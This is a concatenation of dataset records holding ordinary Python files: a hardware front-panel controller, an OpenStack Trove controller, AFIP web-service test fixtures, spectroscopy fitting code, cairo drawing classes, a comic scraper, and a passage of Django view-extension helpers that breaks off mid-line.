program\"\"\"\nfrom enum import Enum, auto\nimport sys\nimport time\nimport keyboard\nimport elf\n\nclass Mode(Enum):\n \"\"\"Current control mode.\"\"\"\n CONTROL = auto()\n KEYBOARD = auto()\n\nCARD = elf.Elf()\n\nif sys.platform == 'win32':\n import msvcrt # pylint: disable=import-error\n getch = msvcrt.getch\n getche = msvcrt.getche\nelse:\n import termios # pylint: disable=import-error\n def __gen_ch_getter(echo):\n def __fun():\n fdesc = sys.stdin.fileno()\n oldattr = termios.tcgetattr(fdesc)\n newattr = oldattr[:]\n try:\n if echo:\n # disable ctrl character printing, otherwise, backspace will be printed as \"^?\"\n lflag = ~(termios.ICANON | termios.ECHOCTL)\n else:\n lflag = ~(termios.ICANON | termios.ECHO)\n newattr[3] &= lflag\n termios.tcsetattr(fdesc, termios.TCSADRAIN, newattr)\n char = sys.stdin.read(1)\n if echo and ord(char) == 127: # backspace\n # emulate backspace erasing\n # https://stackoverflow.com/a/47962872/404271\n sys.stdout.write('\\b \\b')\n finally:\n termios.tcsetattr(fdesc, termios.TCSADRAIN, oldattr)\n return char\n return __fun\n getch = __gen_ch_getter(False)\n getche = __gen_ch_getter(True)\n\ndef update_status(mode):\n \"\"\"Update status display line.\"\"\"\n print(f'\\rMode: {\"KEYBD\" if mode == Mode.KEYBOARD else CARD.mode:5} '\n f'Mem Protect: {\"ON\" if CARD.mem_protect else \"OFF\":3} '\n f'Data: {CARD.data:02X}', end='')\n\ndef press_input():\n \"\"\"Press the input key on the computer.\"\"\"\n CARD.ef4_n = True\n time.sleep(0.005)\n CARD.ef4_n = False\n\ndef load_program(bin_file):\n \"\"\"Load the contents of a binary file.\"\"\"\n with open(bin_file, 'rb') as file:\n byte = file.read(1)\n while byte:\n CARD.data = byte[0]\n press_input()\n byte = file.read(1)\n\ndef load_monitor():\n \"\"\"Load the MAX monitor and BIOS.\"\"\"\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.LOAD\n CARD.mem_protect = False\n load_program('bootstrap.bin')\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.RUN\n CARD.data = 0x80\n press_input()\n CARD.data = 0x00\n press_input()\n load_program('max_mon.bin')\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.RUN\n CARD.data = 0x84\n press_input()\n CARD.data = 0x00\n press_input()\n load_program('max_bios.bin')\n CARD.mode = CARD.Mode.RESET\n\ndef run_monitor():\n \"\"\"Reset the machine and run the monitor.\"\"\"\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.LOAD\n CARD.data = 0xC0\n press_input()\n CARD.data = 0x80\n press_input()\n CARD.data = 0x00\n press_input()\n CARD.mode = CARD.Mode.RESET\n CARD.mode = CARD.Mode.RUN\n\ndef on_key(key): #pylint: disable=too-many-branches\n \"\"\"Callback for when a keyboard key is pressed.\"\"\"\n if key in ('i', '\\n', ' '):\n CARD.ef4_n = True\n elif key == '0':\n CARD.data = (CARD.data << 4 | 0x0) & 0xff\n elif key == '1':\n CARD.data = (CARD.data << 4 | 0x1) & 0xff\n elif key == '2':\n CARD.data = (CARD.data << 4 | 0x2) & 0xff\n elif key == '3':\n CARD.data = (CARD.data << 4 | 0x3) & 0xff\n elif key == '4':\n CARD.data = (CARD.data << 4 | 0x4) & 0xff\n elif key == '5':\n CARD.data = (CARD.data << 4 | 0x5) & 0xff\n elif key == '6':\n CARD.data = (CARD.data << 4 | 0x6) & 0xff\n elif key == '7':\n CARD.data = (CARD.data << 4 | 0x7) & 0xff\n elif key == '8':\n CARD.data = (CARD.data << 4 | 0x8) & 0xff\n elif key == '9':\n CARD.data = (CARD.data << 4 | 0x9) & 0xff\n elif key == 'a':\n CARD.data = (CARD.data << 4 | 0xA) & 0xff\n elif key == 'b':\n CARD.data = (CARD.data << 4 | 0xB) & 0xff\n elif key == 'c':\n CARD.data = (CARD.data << 4 | 0xC) & 0xff\n elif key == 'd':\n CARD.data = (CARD.data << 4 | 0xD) & 0xff\n elif key == 'e':\n CARD.data = (CARD.data << 4 | 0xE) & 0xff\n elif key == 'f':\n CARD.data = (CARD.data << 4 | 0xF) & 0xff\n elif key == 'l':\n CARD.mode = CARD.Mode.LOAD\n elif key == 'r':\n CARD.mode = CARD.Mode.RESET\n elif key == 'g':\n CARD.mode = CARD.Mode.RUN\n elif key == 'w':\n CARD.mode = CARD.Mode.PAUSE\n elif key == 'p':\n CARD.mem_protect = not CARD.mem_protect\n elif key == 'z':\n load_monitor()\n elif key == 'm':\n run_monitor()\n\ndef on_release(_key):\n \"\"\"Callback when keyboard key is released.\"\"\"\n CARD.ef4_n = False\n CARD.stb_n = False\n\ndef run_card():\n \"\"\"Set up keyboard callbacks and respond to keys.\"\"\"\n done = False\n\n keyboard.on_release_key('i', on_release)\n keyboard.on_release_key('\\n', on_release)\n keyboard.on_release_key(' ', on_release)\n\n mode = Mode.CONTROL\n\n update_status(mode)\n\n while not done:\n char = getch().lower()\n if char == 'q':\n done = True\n else:\n if ord(char) == 0:\n if mode == Mode.CONTROL:\n mode = Mode.KEYBOARD\n else:\n mode = Mode.CONTROL\n else:\n if mode == Mode.KEYBOARD:\n CARD.data = ord(char)\n CARD.stb_n = True\n else:\n on_key(char)\n update_status(mode)\n\n print() # Print new line\n\nif __name__ == \"__main__\":\n run_card()\n","sub_path":"python/elf_fp.py","file_name":"elf_fp.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292957328","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2010-2012 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport routes\nimport webob.exc\n\nfrom trove.common import cfg\nfrom trove.common import exception\nfrom trove.common import utils\nfrom trove.common import wsgi\nfrom trove.openstack.common import log as logging\nfrom trove.instance import models as inst_models\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\nclass ServiceImageController(wsgi.Controller):\n \"\"\"Controller for service images functionality\"\"\"\n\n def show(self, req, tenant_id, id):\n \"\"\"Return a single flavor.\"\"\"\n LOG.info(\"Get service image %s detail.\"%id)\n context = req.environ[wsgi.CONTEXT_KEY]\n #self._validate_flavor_id(id)\n #flavor = models.Flavor(context=context, flavor_id=int(id))\n # Pass in the request to build accurate links.\n #return wsgi.Result(views.ServiceImageView(flavor, req).data(), 200)\n pass\n\n def index(self, req, tenant_id):\n \"\"\"Return all flavors.\"\"\"\n LOG.info(\"Get service images list.\")\n context = req.environ[wsgi.CONTEXT_KEY]\n #flavors = models.Flavors(context=context)\n #return wsgi.Result(views.View(flavors, req).data(), 200)\n db_info = inst_models.ServiceImage.find_all()\n images = []\n \n for _item in db_info:\n kv = {}\n kv['service_name'] = _item.service_name\n kv['image_id'] = _item.image_id\n kv['default'] = 'no'\n if _item.service_name==CONF.service_type:\n kv['default'] = 'yes' \n images.append(kv)\n\n ret = {'serviceimages': images}\n return wsgi.Result(ret, 202)\n\n","sub_path":"trove/patch/service_image/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"178116244","text":"import sys, os\n\n# HACK para que los modulos se importen correctamente\nsys.path.append(os.getcwd())\n\nfrom wsfe_suds import WSFEv1\nfrom wsfex_suds import WSFEX\nfrom wsaa_suds import WSAA\nimport pytz\n\n#cuit = 30711339740 # PLOT30710981295\n#cuit = 30712145028 # Mundo Press\n#cuit = 30712306544 # Eynes\ncuit = 30710981295 # E-MIPS Test\n\n# Funcion de creacion de la clase WSFE\ndef create_test_wsfev1():\n# wsaa = WSAA()\n# wsfev1 = WSFEv1(wsaa, cuit, \"https://servicios1.afip.gov.ar/wsfev1/service.asmx?wsdl\")\n\n\n cert = \"/home/skennedy/proyectos/afipws/certs/e-mips_test.crt\"\n key = \"/home/skennedy/proyectos/afipws/certs/privada.key\"\n #cert = \"/home/skennedy/proyectos/afipws/certs2014/PLOT/CERTIFICADOWSFE2014_66d9bd3bf64846c3.crt\"\n #key = \"/home/skennedy/proyectos/afipws/certs2014/PLOT/privada.key\"\n wsaaurl_homo = \"https://wsaahomo.afip.gov.ar/ws/services/LoginCms?wsdl\"\n wsaaurl_prod = \"https://wsaa.afip.gov.ar/ws/services/LoginCms?wsdl\"\n wsaa = WSAA(cert=cert, private_key=key, wsaaurl=wsaaurl_homo, service=\"wsfe\")\n\n wsfeurl_prod = \"https://servicios1.afip.gov.ar/wsfev1/service.asmx?wsdl\"\n wsfeurl_homo = \"https://wswhomo.afip.gov.ar/wsfev1/service.asmx?wsdl\" \n wsfev1 = WSFEv1(wsaa, cuit, wsfeurl=wsfeurl_homo)\n\n return wsfev1\n\n# Destruccion\ndef destroy_test_wsfev1():\n pass\n\n# Funcion de creacion de la clase WSFEX\ndef create_test_wsfex():\n cert = \"/home/skennedy/proyectos/afipws/certs/e-mips_test.crt\"\n key = \"/home/skennedy/proyectos/afipws/certs/privada.key\"\n tz = pytz.timezone('America/Argentina/Buenos_Aires') or pytz.utc\n\n wsaaurl_homo = \"https://wsaahomo.afip.gov.ar/ws/services/LoginCms?wsdl\"\n\n wsaa = WSAA(cert=cert, private_key=key, wsaaurl=wsaaurl_homo, service=\"wsfex\", tz=tz)\n wsaa.get_token_and_sign()\n wsfex = WSFEX(cuit, wsaa.token, wsaa.sign, \"https://wswhomo.afip.gov.ar/wsfexv1/service.asmx?wsdl\")\n return wsfex\n\n# Destruccion\ndef destroy_test_wsfex():\n pass\n\n# Function Argument para instanciar el objeto WSFE y tenerlo durante toda la sesion\ndef pytest_funcarg__wsfe(request):\n return request.cached_setup(\n setup=lambda: create_test_wsfe(),\n teardown=lambda val: destroy_test_wsfe(),\n scope=\"session\"\n )\n\ndef pytest_funcarg__wsfev1(request):\n return request.cached_setup(\n setup=lambda: create_test_wsfev1(),\n teardown=lambda val: destroy_test_wsfev1(),\n scope=\"session\"\n )\n\ndef pytest_funcarg__wsfex(request):\n return request.cached_setup(\n setup=lambda: create_test_wsfex(),\n teardown=lambda val: destroy_test_wsfex(),\n scope=\"session\"\n )\n","sub_path":"l10n_ar_wsfe/wsfetools/test_wsfe/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"527416500","text":"import math\n\nimport numpy as np\nfrom numpy import exp\nfrom scipy.interpolate import interp1d\n\nfrom source.compilation import compile_EQE\nfrom source.utils import R_squared\n\n\n# -----------------------------------------------------------------------------------------------------------\n\n# Function to calculate gaussian absorption\n\ndef calculate_gaussian_absorption(x, f, l, E, T):\n \"\"\"\n :param x: List of energy values [list]\n :param f: Oscillator strength [float]\n :param l: Reorganization Energy [float]\n :param E: Peak Energy [float]\n :param T: Temperature [float or int]\n :return: EQE value [float]\n \"\"\"\n\n # Define variables\n k = 8.617 * math.pow(10, -5) # [ev/K]\n\n return (f / (x * math.sqrt(4 * math.pi * l * T * k))) * exp(-(E + l - x) ** 2 / (4 * l * k * T))\n\n\n# -----------------------------------------------------------------------------------------------------------\n\n# Function to calculate gaussian absorption including disorder\n\ndef calculate_gaussian_disorder_absorption(x, f, l, E, sig, T):\n \"\"\"\n :param x: List of energy values [list]\n :param f: Oscillator strength [float]\n :param l: Reorganization Energy [float]\n :param E: Peak Energy [float]\n :param sig: Peak disorder [float]\n :param T: Temperature [float or int]\n :return: EQE value [float]\n \"\"\"\n\n # Define variables\n k = 8.617 * math.pow(10, -5) # [ev/K]\n\n return (f / (x * math.sqrt(2 * math.pi * (2 * l * T * k + sig ** 2))) * exp(\n -(E + l - x) ** 2 / (4 * l * k * T + 2 * sig ** 2)))\n\n\n# -----------------------------------------------------------------------------------------------------------\n\n# Function to calculate parameters for double peak fit\n\ndef calculate_combined_fit(eqe,\n stopE,\n best_vals_Opt,\n best_vals_CT,\n T,\n R2_Opt=None,\n R2_CT=None,\n include_disorder=False,\n bias=False,\n tolerance=0,\n range=1.05\n ):\n \"\"\"\n Function to compile combined fit for S1 and CT peak absorption after single peak fits\n :param eqe: EQE values [list]\n :param stopE: stop energy of fit [float]\n :param best_vals_Opt: Opt fit values [list]\n :param best_vals_CT: CT fit values [list]\n :param T: Temperature [float]\n :param R2_Opt: Opt fit R2 [float]\n :param R2_CT: CT fit R2 [float]\n :param include_disorder: boolean value to see whether to include disorder [bool]\n :param bias: bias fit below data [boolean]\n :param tolerance: tolerance accepted of fit above data [float]\n :param range: defines upper bound of R2 calculation [float]\n :return: result_dict : dictionary with fit results [dict]\n Dict keys:\n R2_Combined: R2 of sum of CT and Opt fit [float]\n R2_CT: R2 of CT fit [float]\n R2_Opt: R2 of Opt fit [float]\n R2_Average: average R2 of CT / Opt / Combined fit [float]\n Combined_Fit: sum of CT and Opt fit [list]\n Opt_fit: Opt fit values [list]\n CT_fit: CT fit values [list]\n Energy: Energy values [list]\n EQE: original EQE data [list]\n \"\"\"\n\n wave_data, energy_data, eqe_data, log_eqe_data = compile_EQE(eqe,\n min(eqe['Energy']),\n stopE * range, # Increase stop energy to expand fit!\n 1)\n # # Optional code to add interpolation to the data\n # int_func = interp1d(eqe['Energy'], eqe['EQE'])\n # energy_data = np.arange(min(eqe['Energy']), stopE * range, 1)\n # eqe_data = int_func(energy_data)\n\n if sum(best_vals_Opt) != 0 and sum(best_vals_CT) != 0:\n Opt_fit = np.array([calculate_gaussian_absorption(e,\n best_vals_Opt[0],\n best_vals_Opt[1],\n best_vals_Opt[2],\n T)\n for e in energy_data])\n if R2_Opt is None:\n R2_Opt = R_squared(y_data=eqe_data,\n yfit_data=Opt_fit.tolist(),\n bias=bias,\n tolerance=tolerance)\n if include_disorder:\n CT_fit = np.array([calculate_gaussian_disorder_absorption(e,\n best_vals_CT[0],\n best_vals_CT[1],\n best_vals_CT[2],\n best_vals_CT[3],\n T)\n for e in energy_data])\n\n else:\n CT_fit = np.array([calculate_gaussian_absorption(e,\n best_vals_CT[0],\n best_vals_CT[1],\n best_vals_CT[2],\n T)\n for e in energy_data])\n if R2_CT is None:\n R2_CT = R_squared(y_data=eqe_data,\n yfit_data=CT_fit.tolist(),\n bias=bias,\n tolerance=tolerance)\n\n if len(Opt_fit) == len(CT_fit):\n combined_Fit = Opt_fit + CT_fit\n combined_R_Squared = R_squared(y_data=eqe_data,\n yfit_data=combined_Fit.tolist(),\n bias=bias,\n tolerance=tolerance)\n\n else: # if any of the fits were unsuccessful\n Opt_fit = 0\n CT_fit = 0\n combined_Fit = 0\n combined_R_Squared = 0\n\n average_R_Squared = (R2_CT + R2_Opt + combined_R_Squared) / 3\n\n result_dict = {'R2_Combined': combined_R_Squared,\n 'R2_CT': R2_CT,\n 'R2_Opt': R2_Opt,\n 'R2_Average': average_R_Squared,\n 'Combined_Fit': combined_Fit,\n 'Opt_Fit': Opt_fit,\n 'CT_Fit': CT_fit,\n 'Energy': energy_data,\n 'EQE': eqe_data\n }\n\n return result_dict\n\n # # Old code to return a list instead of dictionary\n # return [combined_R_Squared, combined_Fit, Opt_fit, CT_fit, energy_data, eqe_data]\n\n# -----------------------------------------------------------------------------------------------------------\n","sub_path":"source/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345112236","text":"with open('cafe.txt', 'w', encoding='utf-8') as f:\n f.write('cafe')\nwith open('cafe.txt', encoding='utf-8') as f:\n msg = f.read()\n print(msg)\nimport csv\n\nwith open('eggs.csv', 'w', newline='') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=' ',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow(['Spam'] * 5 + ['Baked Beans'])\n spamwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n","sub_path":"test/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"608962536","text":"import cairo\r\nimport numpy as np\r\n\r\nclass Shape:\r\n def __init__(self, stroke = None, fill = None):\r\n self.stroke = stroke\r\n self.fill = fill\r\n \r\n def draw(self, ctx):\r\n draw_stroke(ctx, self.stroke)\r\n draw_fill(ctx, self.fill)\r\n\r\nclass Circle(Shape):\r\n def __init__(self, cx, cy, radius, **kwargs):\r\n super().__init__(**kwargs)\r\n self.args = [cx, cy, radius]\r\n \r\n def draw(self, ctx):\r\n ctx.arc(*self.args, 0, 2 * np.pi)\r\n super().draw(ctx)\r\n\r\nclass Rectangle(Shape):\r\n def __init__(self, x, y, w, h, **kwargs):\r\n super().__init__(**kwargs)\r\n self.args = [x, y, w, h]\r\n \r\n def draw(self, ctx):\r\n ctx.rectangle(*self.args)\r\n super().draw(ctx)\r\n\r\nclass ShapeGroup:\r\n def __init__(self, shapes):\r\n \"\"\"\r\n shapes: dict of shapes\r\n \"\"\"\r\n self.shapes = shapes\r\n \r\n def draw(self, ctx):\r\n shapes = self.shapes\r\n for key in shapes:\r\n value = shapes[key]\r\n value.draw(ctx)\r\n \r\nclass Transform:\r\n def __init__(self, children = None, translation = None, rotation = None, scale = None):\r\n \"\"\"\r\n translation = (tx, ty)\r\n rotation = angle\r\n scale = (sx, sy)\r\n \"\"\"\r\n self.translation = translation\r\n self.rotation = rotation\r\n self.scale = scale\r\n self.children = children\r\n \r\n def draw(self, ctx):\r\n if self.children is not None:\r\n ctx.save()\r\n if self.translation is not None:\r\n ctx.translate(*self.translation)\r\n if self.rotation is not None:\r\n ctx.rotate(np.radians(self.rotation))\r\n if self.scale is not None:\r\n ctx.scale(*self.scale)\r\n self.children.draw(ctx)\r\n ctx.restore()\r\n\r\ndef draw_stroke(ctx, stroke = None):\r\n if stroke is None:\r\n return\r\n \r\n thickness, color = stroke\r\n ctx.set_line_width(thickness)\r\n ctx.set_source_rgb(*color)\r\n ctx.stroke()\r\n \r\ndef draw_fill(ctx, fill = None):\r\n if fill is None:\r\n return\r\n ctx.set_source_rgb(*fill)\r\n ctx.fill() ","sub_path":"code/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"115982258","text":"from bs4 import BeautifulSoup\nimport requests\n\nwebsite = {\n \"bonequest\": 'https://www.bonequest.com',\n \"nedroid\": 'http://nedroid.com/',\n \"xkcd\": 'https://xkcd.com',\n \"cyanide\": \"http://explosm.net\"\n}\n\ndef getComic(website):\n response = requests.get(website, timeout=5)\n content = BeautifulSoup(response.content, \"html.parser\")\n return content\n\ndef bonequest(content):\n comictxt = content.find('div', attrs={\"class\": \"porn-van-to-mexico\"}).text\n print(comictxt)\n image = content.find('img', {\"class\": \"hitler\"})\n print(website[\"bonequest\"] + image.get('src'))\n\ndef nedroid(content):\n image = content.find('div', attrs={\"id\" : \"comic\"}).img\n print(image.get('src'))\n \ndef xkcd(content):\n image = content.find('div', attrs={\"id\": \"comic\"}).img\n print(website[\"xkcd\"] + image.get('src'))\n\ndef cyanide(content):\n image = content.find('img', attrs={\"id\": \"main-comic\"})\n print(image.get('src'))\n\nbonequest(getComic(website[\"bonequest\"]))\nnedroid(getComic(website[\"nedroid\"]))\nxkcd(getComic(website[\"xkcd\"]))\ncyanide(getComic(website[\"cyanide\"]))\n\n\n ","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449861147","text":"'''\nDjango Generic View Extensions\n\nModel Extensions\n\nOne aim with these Extensions is to help concentrate model specific configurations in the model declaration.\n\nOf particular note, we add support for a number of attributes that can be used in models to achieve certain outcomes.\n\nadd_related, is a way of listing relations without which this model makes no sense.\n \n for example: if you have a models Team and Member, the Team model may have: \n add_related = 'members'\n assuming Team has a ManyToMany relationship with Member and an attribute \"members\".\n \n This would request of the CreateViewExtended and UpdateViewExtended that they provide enough form\n info to easily build rich forms (say a Team form, with a list of Member forms under it).\n \n Similarly the DetailViewExtended wants a rich object to display, as defined by the newteork of\n add_related links. \n \nsort_by, is like the Django Meta option \"ordering\" only it can include properties of the model.\n\nlink_internal and link_external, are two attributes (or properties) that can supply a URL (internal or external respectively)\n\n By internal we mean a link to the DetailView of the object (model instance) that supplies the link_internal.\n \n By external we mean a link to some other site if desired. For example you may have a model Person, and the \n external link may point to their profile on Facebook or LinkedIn or wherever. We support only one external\n link conveniently for now.\n \n__verbose_str_,\n__rich_str__,\n__detail_str__, are properties like __str__ that permit a model to supply different degrees of detail.\n\n This is intended to support the .options and levels of detail in views.\n \n A convention is assumed in which:\n \n __str__ references only model fields (should be fast to provide), contain no HTML and ideally no \n newlines (if possible). \n \n __verbose_str__ can reference related model fields (can be a little slower), contain no HTML and ideally \n no newlines (if possible)\n \n __rich_str__ like __verbose_str__, but can contain internal HTML markup for a richer presentation.\n Should have a signature of:\n def __rich_str__(self, link=None):\n and should call on field_render herein passing that link in.\n \n __detail_str__ like __richs_str__, but can span multiple lines.\n Should have a signature of:\n def __detail_str__(self, link=None):\n and should call on field_render herein passing that link in.\n \nTODO: Add __table_str__ which returns a TR, and if an arg is specified or if it's a class method perhaps a header TR \n'''\n# Python imports\nimport html, collections, inspect\n\n# Django imports\nfrom django.db import models\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import get_current_timezone\n\n# Package imports\nfrom . import FIELD_LINK_CLASS, NONE, NOT_SPECIFIED\nfrom .util import isListType, isListValue, isDictionary, safetitle\nfrom .datetime import time_str\nfrom .options import default, flt, osf, odf\nfrom .decorators import is_property_method\nfrom .html import odm_str, fmt_str\nfrom django_generic_view_extensions.debug import print_debug\n\nsummary_methods = [\"__str__\", \"__verbose_str__\", \"__rich_str__\", \"__detail_str__\"] \n\ndef add_related(model):\n '''\n Provides a safe way of testing a given model's add_related attribute by ensuring always \n a list is provided.\n \n If a model has an attribute named add_related and it is a string that names\n \n 1) a field in this model, or\n 2) a field in another model in the format model.field\n \n or a list of such strings, then we take this as an instruction to include that\n those fields should be included in forms for the model.\n \n The attribute may be missing, None, or invalid as well, and so to make testing\n easier throughout the generic form processors this function always returns a list,\n empty if no valid add_related is found.\n '''\n \n if not hasattr(model, \"add_related\"):\n return []\n \n if isinstance(model.add_related, str):\n return [model.add_related]\n\n if isinstance(model.add_related, list):\n return model.add_related\n \n return []\n\ndef inherit_fields(model):\n '''\n Provides a safe way of testing a given model's inherit_fields attribute by ensuring always \n a list is provided.\n \n If a model has an attribute named inherit_fields and it is a string that names\n \n 1) a field in this model, or\n 2) a field in another model in the format model.field\n \n or a list of such strings, then we take this as an instruction to inherit\n the values of those fields form form to form during one login session.\n \n The attribute may be missing, None, or invalid as well, and so to make testing\n easier throughout the generic form processors this function always returns a list,\n empty if no valid add_related is found.\n '''\n \n if not hasattr(model, \"inherit_fields\"):\n return []\n \n if isinstance(model.inherit_fields, str):\n return [model.inherit_fields]\n\n if isinstance(model.inherit_fields, list):\n return model.inherit_fields\n \n return [] \n\ndef apply_sort_by(queryset):\n '''\n Sorts a query set by the the fields and properties listed in a sort_by attribute if it's specified.\n This augments the meta option order_by in models because that option cannot respect properties.\n This option though wants a sortable property to be specified and that isn't an object, has to be\n like an int or string or something, specifically a field in the object that is sortable. So usage\n is a tad different to order_by. \n '''\n model = queryset.model\n if hasattr(model, 'sort_by'):\n try: \n sort_lambda = \"lambda obj: (obj.\" + \", obj.\".join(model.sort_by) +\")\"\n return sorted(queryset, key=eval(sort_lambda))\n except Exception:\n return queryset\n else:\n return queryset\n\ndef link_target_url(obj, link_target=None):\n '''\n Given an object returns the url linking to that object as defined in the model methods.\n :param obj: an object, being an instance of a Django model which has link methods\n :param link_target: a field_link_target that selects which link method to use\n '''\n url = \"\"\n \n if link_target is None:\n link_target = default(flt)\n \n if link_target == flt.internal and hasattr(obj, \"link_internal\"):\n url = obj.link_internal\n elif link_target == flt.external and hasattr(obj, \"link_external\"):\n url = obj.link_external\n \n return url\n\ndef field_render(field, link_target=None, sum_format=None):\n '''\n Given a field attempts to render it as text to use in a view. Tries to do two things:\n \n 1) Wrap it in an HTML Anchor tag if requested to. Choosing the appropriate URL to use as specified by link_target.\n 2) Convert the field to text using a method selected by sum_format. \n \n :param field: The contents of a field that we want to wrap in a link. This could be a text scalar value \n or an object. If it's a scalar value we do no wrapping and just return it unchanged. If it's an object \n we check and honor the specified link_target and sum_format as best possible. \n \n :param link_target: a field_link_target which tells us what to link to. \n The object must provide properties that return a URL for this purpose.\n \n :param sum_format: an object_summary_format which tells us which string representation to use. The \n object should provide methods that return a string for each possible format, if not, there's a \n fall back trickle down to the basic str() function.\n\n detail and rich summaries are expected to contain HTML code including links so they need to know the link_target \n and cannot be wrapped in an Anchor tag and must be marked safe\n \n verbose and brief summaries are expected to be free of HTML so can be wrapped in an Anchor tag and don't\n need to be marked safe.\n '''\n if link_target is None:\n link_target = default(flt)\n \n if sum_format is None:\n sum_format = default(osf)\n \n tgt = None\n \n if link_target == flt.mailto:\n tgt = f\"mailto:{field}\" \n elif isinstance(link_target, str) and link_target:\n tgt = link_target\n elif link_target == flt.internal and hasattr(field, \"link_internal\"):\n tgt = field.link_internal\n elif link_target == flt.external and hasattr(field, \"link_external\"):\n tgt = field.link_external\n\n fmt = sum_format\n txt = None \n if fmt == osf.detail:\n if callable(getattr(field, '__detail_str__', None)):\n tgt = None\n txt = field.__detail_str__(link_target)\n else:\n fmt = osf.rich\n \n if fmt == osf.rich:\n if callable(getattr(field, '__rich_str__', None)):\n tgt = None\n txt = field.__rich_str__(link_target)\n else:\n fmt = osf.verbose\n \n if fmt == osf.verbose:\n if callable(getattr(field, '__verbose_str__', None)):\n txt = html.escape(field.__verbose_str__())\n else:\n fmt = osf.brief\n\n if fmt == osf.brief:\n if callable(getattr(field, '__str__', None)):\n txt = html.escape(field.__str__())\n else:\n if isinstance(field, models.DateTimeField):\n txt = time_str(field)\n else:\n txt = str(field)\n\n if fmt == osf.template:\n if hasattr(field, 'pk'):\n txt = f\"{{{field._meta.model.__name__}.{field.pk}}}\"\n else:\n txt = \"{field_value}\" \n raise ValueError(\"Internal error, template format not supported for field.\")\n\n if link_target == flt.template:\n tgt = \"{{link.{}.{}.{}}}\".format(FIELD_LINK_CLASS, field._meta.model.__name__, field.pk)\n return mark_safe(u'{}{}{}'.format(tgt, txt, '{link_end}')) # Provides enough info for a template to build the link below. \n elif tgt is None:\n return mark_safe(txt)\n else:\n return mark_safe(u'{}'.format(tgt, FIELD_LINK_CLASS, txt)) \n\ndef object_in_list_format(obj, context):\n '''\n For use in a template tag which can simply pass the object (from the context item object_list) \n and context here and this will produce a string (marked safe as needed) for rendering respecting\n the requests that came in via the context. \n :param obj: an object, probably from the object_list in a context provided to a list view template \n :param context: the context provided to the view (from which we can extract the formatting requests)\n '''\n # we expect an instance list_display_format in the context element \"format\" \n fmt = context['format'].elements\n flt = context['format'].link\n \n return field_render(obj, flt, fmt)\n\ndef collect_rich_object_fields(view):\n '''\n Passed a view instance (a detail view or delete view is expected, but any view could call this) \n which has an object already (view.obj) (so after or in get_object), will define view.fields with \n a dictionary of fields that a renderer can walk through later.\n \n Additionally view.fields_bucketed is a copy of view.fields in the buckets specified in object_display_format\n and view.fields_flat and view.fields_list also contain all the view.fields split into the scalar (flat) values\n and the list values respectively (which are ToMany relations to other models).\n \n Expects ManyToMany relationships to be set up bi-directionally, in both involved models, \n i.e. makes no special effort to find the reverse relationships and if they are not set up \n bi-directionally may miss the indirect, or reverse relationship).\n \n Converts foreign keys to the string representation of that related object using the level of\n detail specified view.format and respecting privacy settings where applicable (values are \n obtained through odm_str where privacy constraints are checked. \n '''\n # Build the list of fields \n # fields_for_model includes ForeignKey and ManyToMany fields in the model definition\n\n # Fields are categorized as follows for convenience and layout and performance decisions\n # flat or list \n # model, internal, related or properties\n #\n # By default we will populate view.fields only with flat model fields.\n \n def is_list(field):\n return hasattr(field,'is_relation') and field.is_relation and (field.one_to_many or field.many_to_many)\n \n def is_property(name):\n return isinstance(getattr(view.model, name), property)\n \n def is_bitfield(field):\n return type(field).__name__==\"BitField\"\n\n ODF = view.format.flags\n\n all_fields = view.obj._meta.get_fields() # All fields\n\n model_fields = collections.OrderedDict() # Editable fields in the model\n internal_fields = collections.OrderedDict() # Non-editable fields in the model\n related_fields = collections.OrderedDict() # Fields in other models related to this one\n \n # Categorize all fields into one of the three buckets above (model, internal, related)\n for field in all_fields:\n if (is_list(field) and ODF & odf.list) or (not is_list(field) and ODF & odf.flat):\n if field.is_relation:\n if ODF & odf.related:\n related_fields[field.name] = field\n else: \n if ODF & odf.model and field.editable and not field.auto_created:\n model_fields[field.name] = field\n elif ODF & odf.internal:\n internal_fields[field.name] = field\n\n # List properties, but respect the format request (list and flat selectors) \n properties = []\n if ODF & odf.properties:\n for name in dir(view.model):\n if is_property(name):\n # Function annotations appear in Python 3.6. In 3.5 and earlier they aren't present.\n # Use the annotations provided on model properties to classify properties and include \n # them based on the classification. The classification is for list and flat respecting \n # the object_display_flags selected. That is all we need here.\n if hasattr(getattr(view.model,name).fget, \"__annotations__\"):\n annotations = 